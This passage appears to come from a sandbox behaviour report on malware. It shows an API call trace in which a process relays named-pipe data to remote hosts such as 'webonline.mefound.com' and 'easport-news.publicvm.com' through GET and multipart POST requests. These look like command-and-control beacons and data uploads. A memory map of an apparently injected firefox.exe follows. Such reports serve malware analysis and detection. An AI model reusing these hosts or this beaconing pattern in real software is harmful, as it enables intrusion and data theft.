lpOverlapped=0x231230) returned 0 [0093.805] GetLastError () returned 0x3e5 [0093.805] SetEvent (hEvent=0x68) returned 1 [0093.805] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0093.811] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x231230, lpNumberOfBytesTransferred=0x57f5dc, bWait=0 | out: lpNumberOfBytesTransferred=0x57f5dc) returned 1 [0093.811] ResetEvent (hEvent=0x68) returned 1 [0093.812] ReadFile (in: hFile=0x60, lpBuffer=0x56f5a4, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x57f5a8, lpOverlapped=0x231230 | out: lpBuffer=0x56f5a4*, lpNumberOfBytesRead=0x57f5a8*=0x86, lpOverlapped=0x231230) returned 1 [0093.812] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0093.812] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x231230, lpNumberOfBytesTransferred=0x57f5a8, bWait=0 | out: lpNumberOfBytesTransferred=0x57f5a8) returned 1 [0093.812] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x57ad1c, cbSize=0x57b51c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x57b51c) returned 0x0 [0093.816] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0093.853] InternetConnectA (hInternet=0xcc0004, lpszServerName="webonline.mefound.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0093.853] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x57b520 | out: lpBuffer=0x0, lpdwBufferLength=0x57b520) returned 0 [0093.853] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x23f938, lpdwBufferLength=0x57b520 | out: lpBuffer=0x23f938, lpdwBufferLength=0x57b520) returned 1 [0093.853] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="index/index.php?h=ppbto8NHADo%3d&d=ppboQHhZlzqml%2bKS9XExD56k2JTzdDAOlqbto8NHADqmlu2jw0d%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0093.854] SetLastError (dwErrCode=0x0) [0093.854] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x57f568, dwBufferLength=0x4) returned 1 [0093.854] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x57f568, dwBufferLength=0x4) returned 1 [0093.854] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x57f568, dwBufferLength=0x4) returned 1 [0093.854] strlen (_Str="Accept: */*") returned 0xb [0093.854] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*", dwHeadersLength=0xb, dwModifiers=0x20000000) returned 1 [0093.854] SetLastError (dwErrCode=0x0) [0093.854] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0098.679] GetLastError () returned 0x0 [0098.679] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x57f540, lpdwBufferLength=0x57f53c, lpdwIndex=0x0 | out: lpBuffer=0x57f540*, lpdwBufferLength=0x57f53c*=0x4, lpdwIndex=0x0) returned 1 [0098.679] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0098.679] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0098.679] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0098.679] WriteFile (in: hFile=0x60, lpBuffer=0x23ffc8*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x57f54c, lpOverlapped=0x231230 | out: lpBuffer=0x23ffc8*, lpNumberOfBytesWritten=0x57f54c*=0xd, lpOverlapped=0x231230) returned 1 [0098.679] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0098.679] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x231230 | out: lpOverlapped=0x231230) returned 0 [0098.679] GetLastError () returned 0x3e5 [0098.679] SetEvent (hEvent=0x68) returned 1 [0098.679] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0098.692] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x231230, lpNumberOfBytesTransferred=0x57f5dc, bWait=0 | out: lpNumberOfBytesTransferred=0x57f5dc) returned 1 [0098.692] ResetEvent (hEvent=0x68) returned 1 [0098.692] ReadFile (in: hFile=0x60, lpBuffer=0x56f5a4, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x57f5a8, lpOverlapped=0x231230 | out: lpBuffer=0x56f5a4*, lpNumberOfBytesRead=0x57f5a8*=0x10a7, lpOverlapped=0x231230) returned 1 [0098.692] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0098.692] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x231230, lpNumberOfBytesTransferred=0x57f5a8, bWait=0 | out: lpNumberOfBytesTransferred=0x57f5a8) returned 1 [0098.692] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x57a6b4, cbSize=0x57aeb4 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x57aeb4) returned 0x0 [0098.692] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0098.692] InternetConnectA (hInternet=0xcc0004, lpszServerName="easport-news.publicvm.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0098.692] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x57aeb8 | out: lpBuffer=0x0, lpdwBufferLength=0x57aeb8) returned 0 [0098.692] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x23ffc8, lpdwBufferLength=0x57aeb8 | out: lpBuffer=0x23ffc8, lpdwBufferLength=0x57aeb8) returned 1 [0098.692] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="index/index.php?h=8AsKjDaVkr4%3d&d=8gsPb42LBb7wCgW9AKOji8g5P7sGpqKKwDsKjDaVkr7wCwqMNpWjiMY6P7QEoKWOwzs%2bvAbRo43EPDi8BKyiit5heusWtbKe0CsqrBa1sp7QKyqsFrWyns%3d%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0098.692] SetLastError (dwErrCode=0x0) [0098.692] GetSystemTime (in: lpSystemTime=0x57f468 | out: lpSystemTime=0x57f468*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xd, wMinute=0x7, wSecond=0x1f, wMilliseconds=0x172)) [0098.692] srand (_Seed=0x172) [0098.693] rand () returned 1246 [0098.693] rand () returned 19701 [0098.693] rand () returned 11845 [0098.693] rand () returned 25735 [0098.693] sprintf (in: _Dest=0x57f40c, _Format="---------------------------%x%x%x%x" | out: _Dest="---------------------------64872e454cf54de") returned 42 [0098.693] sprintf (in: _Dest=0x57f2d8, _Format="Content-Type: multipart/form-data; boundary=%s\r\n" | out: _Dest="Content-Type: multipart/form-data; boundary=---------------------------64872e454cf54de\r\n") returned 88 [0098.693] strlen (_Str="Content-Type: multipart/form-data; boundary=---------------------------64872e454cf54de\r\n") returned 0x58 [0098.693] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=---------------------------64872e454cf54de\r\n", dwHeadersLength=0x58, dwModifiers=0x20000000) returned 1 [0098.693] SetLastError (dwErrCode=0x0) [0098.693] sprintf (in: _Dest=0x57eed8, _Format="--%s\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n" | out: _Dest="-----------------------------64872e454cf54de\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 134 [0098.693] sprintf (in: _Dest=0x57f0d8, _Format="\r\n--%s--\r\n" | out: _Dest="\r\n-----------------------------64872e454cf54de--\r\n") returned 50 [0098.693] strlen (_Str="\r\n-----------------------------64872e454cf54de--\r\n") returned 0x32 [0098.693] strlen (_Str="-----------------------------64872e454cf54de\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x86 [0098.693] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x57f558, dwBufferLength=0x4) returned 1 [0098.693] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x57f558, dwBufferLength=0x4) returned 1 [0098.693] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x57f558, dwBufferLength=0x4) returned 1 [0098.693] HttpSendRequestExA (in: hRequest=0xcc000c, lpBuffersIn=0x57f440, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0099.169] strlen (_Str="-----------------------------64872e454cf54de\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x86 [0099.169] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x57eed8*, dwNumberOfBytesToWrite=0x86, lpdwNumberOfBytesWritten=0x57f55c | out: lpBuffer=0x57eed8*, lpdwNumberOfBytesWritten=0x57f55c*=0x86) returned 1 [0099.169] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x20f0b43*, dwNumberOfBytesToWrite=0xfa4, lpdwNumberOfBytesWritten=0x57f55c | out: lpBuffer=0x20f0b43*, lpdwNumberOfBytesWritten=0x57f55c*=0xfa4) returned 1 [0099.169] strlen (_Str="\r\n-----------------------------64872e454cf54de--\r\n") returned 0x32 [0099.169] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x57f0d8*, dwNumberOfBytesToWrite=0x32, lpdwNumberOfBytesWritten=0x57f55c | out: lpBuffer=0x57f0d8*, lpdwNumberOfBytesWritten=0x57f55c*=0x32) returned 1 [0099.169] HttpEndRequestA (in: hRequest=0xcc000c, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0100.187] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x57f47c, lpdwBufferLength=0x57f478, lpdwIndex=0x0 | out: lpBuffer=0x57f47c*, lpdwBufferLength=0x57f478*=0x4, lpdwIndex=0x0) returned 1 [0100.187] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x57f47c, lpdwBufferLength=0x57f478, lpdwIndex=0x0 | out: lpBuffer=0x57f47c*, lpdwBufferLength=0x57f478*=0x4, lpdwIndex=0x0) returned 1 [0100.187] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x57aed8, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x57f55c | out: lpBuffer=0x57aed8*, lpdwNumberOfBytesRead=0x57f55c*=0x130) returned 1 [0100.188] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x57aed8, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x57f55c | out: lpBuffer=0x57aed8*, lpdwNumberOfBytesRead=0x57f55c*=0x0) returned 1 [0100.188] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0100.188] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0100.188] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0100.188] WriteFile (in: hFile=0x60, lpBuffer=0x20f1af0*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x57f550, lpOverlapped=0x231230 | out: lpBuffer=0x20f1af0*, lpNumberOfBytesWritten=0x57f550*=0x134, lpOverlapped=0x231230) returned 1 [0100.188] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0100.188] ConnectNamedPipe (in: hNamedPipe=0x60, lpOverlapped=0x231230 | out: lpOverlapped=0x231230) returned 0 [0100.188] GetLastError () returned 0x3e5 [0100.188] SetEvent (hEvent=0x68) returned 1 [0100.188] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0100.195] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x231230, lpNumberOfBytesTransferred=0x57f5dc, bWait=0 | out: lpNumberOfBytesTransferred=0x57f5dc) returned 1 [0100.195] ResetEvent (hEvent=0x68) returned 1 [0100.195] ReadFile (in: hFile=0x60, lpBuffer=0x56f5a4, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x57f5a8, lpOverlapped=0x231230 | out: lpBuffer=0x56f5a4*, lpNumberOfBytesRead=0x57f5a8*=0x8, lpOverlapped=0x231230) returned 1 [0100.195] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0x1d4c0) returned 0x0 [0100.195] GetOverlappedResult (in: hFile=0x60, lpOverlapped=0x231230, lpNumberOfBytesTransferred=0x57f5a8, bWait=0 | out: lpNumberOfBytesTransferred=0x57f5a8) returned 1 [0100.195] DisconnectNamedPipe (hNamedPipe=0x60) returned 1 [0100.195] ExitProcess (uExitCode=0x0) Thread: id = 207 os_tid = 0x860 Thread: id = 208 os_tid = 0x6a4 Thread: id = 209 os_tid = 0x870 Thread: id = 210 os_tid = 0x880 Thread: id = 211 os_tid = 0x890 Thread: id = 212 os_tid = 0x8c0 Thread: id = 213 os_tid = 0x300 Process: id = "78" image_name = "firefox.exe" filename = "c:\\program files\\mozilla firefox\\firefox.exe" page_root = "0x7ef4faa0" os_pid = "0x7a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xaac" cmd_line = "\"c:\\program files\\mozilla firefox\\firefox.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3760 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3761 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3762 start_va = 0x40000 end_va = 0x42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3763 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3764 start_va = 0x180000 end_va = 0x1c3fff entry_point = 0x180000 region_type = mapped_file name = "firefox.exe" filename = "\\Program Files\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files\\mozilla firefox\\firefox.exe") Region: id = 3765 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3766 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3767 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3768 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3769 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 3770 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3771 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3772 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3773 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3774 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3775 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3776 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3777 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3778 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3779 start_va = 0x6cd50000 end_va = 0x6ce0dfff entry_point = 0x6cd50000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcr100.dll") Region: id = 3780 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3781 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3782 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3783 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3784 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3785 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3786 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 3787 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3788 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3789 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3790 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3791 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 3792 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 3793 start_va = 0x1480000 end_va = 0x148ffff entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 3794 start_va = 0x76600000 end_va = 0x766f4fff entry_point = 0x76600000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3795 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3796 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3797 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3798 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3799 start_va = 0x77830000 end_va = 0x77965fff entry_point = 0x77830000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3800 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3801 start_va = 0x77690000 end_va = 0x7771efff entry_point = 0x77690000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3802 start_va = 0x76050000 end_va = 0x7616cfff entry_point = 0x76050000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3803 start_va = 0x75f40000 end_va = 0x75f4bfff entry_point = 0x75f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3804 start_va = 0x763f0000 end_va = 0x765eafff entry_point = 0x763f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3805 start_va = 0x1490000 end_va = 0x175efff entry_point = 0x1490000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3806 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3807 start_va = 0x74eb0000 end_va = 0x7504dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 3808 start_va = 0x80000 end_va = 0x80fff entry_point = 0x80000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3809 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 3810 start_va = 0x75e00000 end_va = 0x75e1afff entry_point = 0x75e00000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3811 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3812 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 3813 start_va = 0x75ed0000 end_va = 0x75edafff entry_point = 0x75ed0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3814 start_va = 0x1d0000 end_va = 0x1fbfff entry_point = 0x1d0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 3815 start_va = 0xa0000 end_va = 0xa7fff entry_point = 0xa0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 3816 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x160000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 3817 start_va = 0x1370000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 3818 start_va = 0x74550000 end_va = 0x74570fff entry_point = 0x74550000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3819 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 3820 start_va = 0x763a0000 end_va = 0x763e4fff entry_point = 0x763a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3821 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3822 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3823 start_va = 0x1760000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 3824 start_va = 0x75820000 end_va = 0x75863fff entry_point = 0x75820000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3825 start_va = 0x12b0000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 3826 start_va = 0x74130000 end_va = 0x7414bfff entry_point = 0x74130000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3827 start_va = 0x74120000 end_va = 0x74126fff entry_point = 0x74120000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3828 start_va = 0x17a0000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 3829 start_va = 0x1940000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 3830 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" 